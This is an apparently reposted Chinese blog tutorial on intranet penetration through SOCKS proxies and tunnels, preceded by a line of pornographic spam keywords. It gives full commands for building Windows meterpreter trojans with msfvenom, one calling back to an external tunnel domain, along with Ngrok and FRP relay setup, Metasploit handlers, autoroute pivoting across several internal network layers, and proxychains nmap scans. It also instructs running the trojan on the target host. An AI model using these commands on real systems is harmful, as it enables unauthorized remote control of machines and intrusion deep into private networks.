国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

這篇具有很好參考價值的文章主要介紹了內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

Socks 代理又稱全能代理,就像有很多跳線的轉(zhuǎn)接板,它只是簡單地將一端的系統(tǒng)連接到另外一端。支持多種協(xié)議,包括http、ftp請求及其它類型的請求。它分socks 4 和socks 5兩種類型,socks 4只支持TCP協(xié)議而socks 5支持TCP/UDP協(xié)議,還支持各種身份驗證機制等協(xié)議。其標(biāo)準(zhǔn)端口為1080.


目錄:

內(nèi)網(wǎng)安全:Socks 代理 技術(shù).

兩個內(nèi)網(wǎng)通訊上線( Ngrok )

(1)開通隧道:

(2)下載客戶端:

(3)生成一個程序后門:

(4)進(jìn)行監(jiān)聽:(kali)

兩個內(nèi)網(wǎng)通訊上線( Frp 自建跳板 )

(1)跳板環(huán)境搭建:

(2)生成程序后面:

(3)進(jìn)行監(jiān)聽:(kali)

本地代理:( MSF?跳板多個內(nèi)網(wǎng)主機系列)

第二層內(nèi)網(wǎng)代理:

(1)信息收集及配置訪問:

(2)開啟本地代理:

(3)內(nèi)網(wǎng)掃描:

(4)瀏覽器訪問:

第三層內(nèi)網(wǎng)代理:

(1)生成正向程序后門:

(2)進(jìn)行監(jiān)聽:

(3)信息收集及配置訪問:

(4)開啟本地代理:

第四層內(nèi)網(wǎng)滲透:

(1)生成正向程序后門:

?(2)進(jìn)行監(jiān)聽:


代理解決的問題:(1)內(nèi)網(wǎng)有外網(wǎng)    (2)內(nèi)網(wǎng)有過濾    (3)內(nèi)網(wǎng)無外網(wǎng)

兩個內(nèi)網(wǎng)通訊上線( Ngrok )

開通隧道工具:https://www.ngrok.cc/user.html
理解:二個內(nèi)網(wǎng)主機不能相互連接的,這樣就可以通過開通的隧道進(jìn)行連接.
(開通的隧道就是在外網(wǎng)開通一個域名:當(dāng)目標(biāo)訪問這個域名,則會將數(shù)據(jù)返還回來到kali中)

(1)開通隧道:

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


(2)下載客戶端:

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

解壓放到 kali 中:(切換的剛剛下載的文件目錄中)

(1)./sunny clientid 115735315695        // 執(zhí)行 

    ./sunny clientid 隧道的IP

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


(3)生成一個程序后門:(木馬)

msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


(4)進(jìn)行監(jiān)聽:(kali)

(1)msfconsole

(2)use exploit/multi/handler

(3)set payload windows/meterpreter/reverse_http

(4)set lhost 192.168.0.106        // 本地的 IP 地址

(5)set lport 4444                 // 本地的 端口.

(6)exploit

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


兩個內(nèi)網(wǎng)通訊上線( Frp 自建跳板 )

(1)跳板環(huán)境搭建:

需要有自己的服務(wù)器,有來搭建跳板.
【服務(wù)器 和 控制端】需要下載的工具:https://github.com/fatedier/frp/releases

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

服務(wù)器修改配置文件 frps.ini:
[common]
bind_port = 6677            // 這個端口修改為 服務(wù)器 開放的就行

啟動服務(wù)端:【切換在下載的目錄并執(zhí)行】
./frps -c ./frps.ini
控制端修改配置文件 frpc.ini:
[common]
server_addr = 云主機 IP 地址
server_port = 6677                 // frpc 工作端口,必須和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555                  // 轉(zhuǎn)發(fā)給本機的 5555
remote_port = 6000                 // 服務(wù)端用 6000 端口轉(zhuǎn)發(fā)給本機

啟動客戶端:【切換在下載的目錄并執(zhí)行】
./frpc -c ./frpc.ini

(2)生成程序后面:(木馬)

msfvenom -p windows/meterpreter/reverse_tcp lhost=服務(wù)器(公網(wǎng))的IP地址 lport=6000 -f exe -o frp.exe

(3)進(jìn)行監(jiān)聽:(kali)

(1)msfconsole

(2)use exploit/multi/handler

(3)set payload windows/meterpreter/reverse_tcp

(4)set LHOST 127.0.0.1    

(5)set LPORT 5555        // 本機監(jiān)聽的端口【和控制端的一樣】

(6)exploit

然后把程序后門(木馬)放在目標(biāo)主機上執(zhí)行就行.

本地代理:( MSF?跳板多個內(nèi)網(wǎng)主機系列)

第二層內(nèi)網(wǎng)代理:

(1)信息收集及配置訪問:

(1)run get_local_subnets            // 獲取網(wǎng)絡(luò)接口

(2)run autoroute -p                 // 查看路由地址

(3)run autoroute -s 10.0.20.0/24    // 添加地二層內(nèi)網(wǎng)的路由網(wǎng)段.

或

(3)run post/multi/manage/autoroute        // 自動添加,目前所有路由網(wǎng)段

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


(2)開啟本地代理:

background                            // 掛起會話

如果是msf6,使用代理模板為:

use auxiliary/server/socks_proxy

如果是msf5,使用代理模板為:

use auxiliary/server/socks4a
(1)set srvport 2222        // 設(shè)置本地代理端口為2222

(2)exploit                 // 運行

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


(3)內(nèi)網(wǎng)掃描:

打開 /etc/proxychains4.conf 文件:

socks4 192.168.0.106 2222                // 添加 本地的代理和端口

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

進(jìn)行掃描:

proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80 

-Pn:掃描主機檢測其是否受到數(shù)據(jù)包過濾軟件或防火墻的保護(hù).

-sT:掃描 TCP 數(shù)據(jù)包已建立的連接 connect

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


(4)瀏覽器訪問:

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


第三層內(nèi)網(wǎng)代理:

(1)生成正向程序后門:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


(2)進(jìn)行監(jiān)聽:

要在和上面一樣的 msf 會話中執(zhí)行.

(1)use exploit/multi/handler    

(2)set payload windows/x64/meterpreter/bind_tcp

(3)set rhost 10.0.20.99                // 第二層內(nèi)網(wǎng)的 IP 地址

(4)set lport 54321                     // 和程序后面(木馬)一樣的端口

(5)exploit

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


(3)信息收集及配置訪問:

(1)run get_local_subnets            // 獲取網(wǎng)絡(luò)接口

(2)run autoroute -p                 // 查看路由地址

(3)run post/multi/manage/autoroute        // 自動添加,目前所有路由網(wǎng)段.

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


(4)開啟本地代理:

background                            // 掛起會話

如果是msf6,使用代理模板為:

use auxiliary/server/socks_proxy

如果是msf5,使用代理模板為:

use auxiliary/server/socks4a

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

(1)set srvport 6666        // 默認(rèn)端口6666

(2)exploit                 // 運行

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


第四層內(nèi)網(wǎng)滲透:

(1)生成正向程序后門:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).


?(2)進(jìn)行監(jiān)聽:

要在和上面一樣的 msf 會話中執(zhí)行.

(1)use exploit/multi/handler    

(2)set payload windows/x64/meterpreter/bind_tcp

(3)set rhost 10.0.10.110                // 第二層內(nèi)網(wǎng)的 IP 地址

(4)set lport 9876                     // 和程序后面(木馬)一樣的端口

(5)exploit

內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).

? ? ??

? ? ?

? ?

學(xué)習(xí)鏈接:第70天:內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)_嗶哩嗶哩_bilibili文章來源地址http://www.zghlxwxcb.cn/news/detail-480681.html

到了這里,關(guān)于內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 內(nèi)網(wǎng)安全-代理Socks協(xié)議&CS-MSF控制上線

    內(nèi)網(wǎng)安全-代理Socks協(xié)議&CS-MSF控制上線

    目錄 實驗前提 實驗環(huán)境 實驗?zāi)繕?biāo) 環(huán)境部署 實驗1 msf通信win10的56網(wǎng)段與正向連接? msf通信win10 msf上線win10 實驗2?cs通信win10的56網(wǎng)段與正向連接 cs通信win10 cs上線win10 ? 實驗環(huán)境 本地計算機存在一個36網(wǎng)段可以與win7ping通并且可以上網(wǎng)。 win7存在36和52網(wǎng)段,可以與本地和win10p

    2024年02月16日
    瀏覽(26)
  • 深入探索代理技術(shù):Socks5、IP代理與網(wǎng)絡(luò)安全

    Socks5代理:高度靈活的網(wǎng)絡(luò)中轉(zhuǎn)站 Socks5代理是一種網(wǎng)絡(luò)協(xié)議,允許客戶端與服務(wù)器進(jìn)行通信,通過代理服務(wù)器中轉(zhuǎn)數(shù)據(jù),起到隱蔽客戶端身份的作用。相比于Socks4,Socks5不僅支持TCP連接,還支持UDP連接,使其在實時數(shù)據(jù)傳輸場景中更具優(yōu)勢。不過,提到\\\"SK5\\\"代理,實際上是沒

    2024年02月12日
    瀏覽(29)
  • Socks5、網(wǎng)絡(luò)安全、代理IP技術(shù)詳解

    ? ? 隨著互聯(lián)網(wǎng)的發(fā)展,網(wǎng)絡(luò)安全問題越來越受到人們的關(guān)注。為了保護(hù)個人隱私和網(wǎng)絡(luò)安全,使用代理服務(wù)器成為了一種普遍的選擇。其中,Socks5協(xié)議是一種常見的代理協(xié)議,而代理IP是使用代理服務(wù)器時經(jīng)常需要考慮的問題。本文將深入探討Socks5、網(wǎng)絡(luò)安全、代理IP等技術(shù)

    2024年02月07日
    瀏覽(22)
  • 代理IP與SOCKS5代理:網(wǎng)絡(luò)安全與數(shù)據(jù)隱私保護(hù)的技術(shù)利器

    深入探討代理IP和SOCKS5代理的技術(shù)性,并闡述它們在網(wǎng)絡(luò)安全和數(shù)據(jù)隱私保護(hù)中的重要作用。我們將詳細(xì)介紹代理IP的概念、工作原理和應(yīng)用場景,以及SOCKS5代理協(xié)議的特點和優(yōu)勢。此外,我們還將討論如何使用代理IP和SOCKS5代理實現(xiàn)匿名訪問、繞過封鎖和保護(hù)個人隱私。通過

    2024年02月11日
    瀏覽(24)
  • 代理IP、Socks5代理、SK5代理與網(wǎng)絡(luò)安全:保護(hù)隱私與防御威脅的技術(shù)探索

    隨著數(shù)字化時代的到來,網(wǎng)絡(luò)安全和個人隱私保護(hù)日益成為重要議題。代理IP、Socks5代理和SK5代理作為關(guān)鍵技術(shù)手段,為用戶提供了保護(hù)隱私、提高網(wǎng)絡(luò)安全性和防御網(wǎng)絡(luò)威脅的解決方案。本文將深入探討這些代理技術(shù)的原理、特點以及它們與網(wǎng)絡(luò)安全的緊密聯(lián)系。 【第一部

    2024年02月13日
    瀏覽(27)
  • Socks5與代理IP技術(shù)探析:構(gòu)建安全高效的網(wǎng)絡(luò)通信

    1.1 握手與身份驗證 Socks5協(xié)議的握手階段通過版本協(xié)商和靈活的身份驗證方式建立安全連接。這確保了通信的可靠性和用戶身份的安全。 1.2 數(shù)據(jù)傳輸機制 Socks5通過代理實現(xiàn)數(shù)據(jù)傳輸,支持TCP和UDP協(xié)議,為用戶提供了高度靈活的網(wǎng)絡(luò)通信機制。連接一旦建立,數(shù)據(jù)可以通過代

    2024年02月04日
    瀏覽(48)
  • Socks5與代理IP技術(shù)的深度解析:保障網(wǎng)絡(luò)通信安全的利器

    隨著互聯(lián)網(wǎng)的發(fā)展,網(wǎng)絡(luò)通信的安全性和隱私保護(hù)變得尤為重要。Socks5協(xié)議與代理IP技術(shù)作為保護(hù)網(wǎng)絡(luò)通信的關(guān)鍵工具,為用戶提供了更加安全、私密的網(wǎng)絡(luò)訪問方式。本文將深入探討Socks5協(xié)議和代理IP技術(shù)的原理、特性以及其在實際應(yīng)用中的技術(shù)細(xì)節(jié)。 2.1 握手與認(rèn)證 Socks

    2024年02月20日
    瀏覽(36)
  • 全面解析 SOCKS5 代理和 HTTP 代理在網(wǎng)絡(luò)安全與爬蟲應(yīng)用中的技術(shù)對比與應(yīng)用指南

    一、SOCKS5 代理和 HTTP 代理的基本原理 SOCKS5 代理:SOCKS5 是一種網(wǎng)絡(luò)協(xié)議,可以在傳輸層代理 TCP 和 UDP 請求。它不解析請求內(nèi)容,僅在客戶端和代理服務(wù)器之間建立連接,并轉(zhuǎn)發(fā)數(shù)據(jù)。SOCKS5 代理支持眾多網(wǎng)絡(luò)協(xié)議和端口類型,具有較高的靈活性和通用性。 HTTP 代理:HTTP 代理

    2024年02月15日
    瀏覽(20)
  • 內(nèi)網(wǎng)安全:代理技術(shù)詳解

    內(nèi)網(wǎng)安全:代理技術(shù)詳解

    目錄 代理技術(shù)實驗所用網(wǎng)絡(luò)拓?fù)鋱D及說明 代理技術(shù) SOCK協(xié)議 使用代理技術(shù)的原因 正向代理與反向代理 實戰(zhàn)一:MSF代理通訊 實驗原理說明 一. Meterpreter建立路由 二. MSF建立節(jié)點 三. 建立代理到MSF上 實戰(zhàn)二:CS代理通訊 實驗原理說明 一. CS建立SOCKS代理 二. 使用proxifier 設(shè)置代理

    2024年02月07日
    瀏覽(30)
  • 內(nèi)網(wǎng)滲透測試 MSF搭建socks代理

    內(nèi)網(wǎng)滲透測試 MSF搭建socks代理

    最終效果為如此,web服務(wù)器可以ping通外網(wǎng)和內(nèi)網(wǎng)兩臺服務(wù)器 ? ? 信息收集 發(fā)現(xiàn)端口: 80 http 3306 mysql 敏感目錄: /phpMyadmin 現(xiàn)在咱們查詢一下日志功能是否開啟,默認(rèn)是關(guān)閉的。 show variables like \\\"general_log%\\\"; 命令行 set globalgeneral_log=\\\'on\\\'; 圖形化: 輸入一句話木馬并執(zhí)行,使日志

    2023年04月08日
    瀏覽(21)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包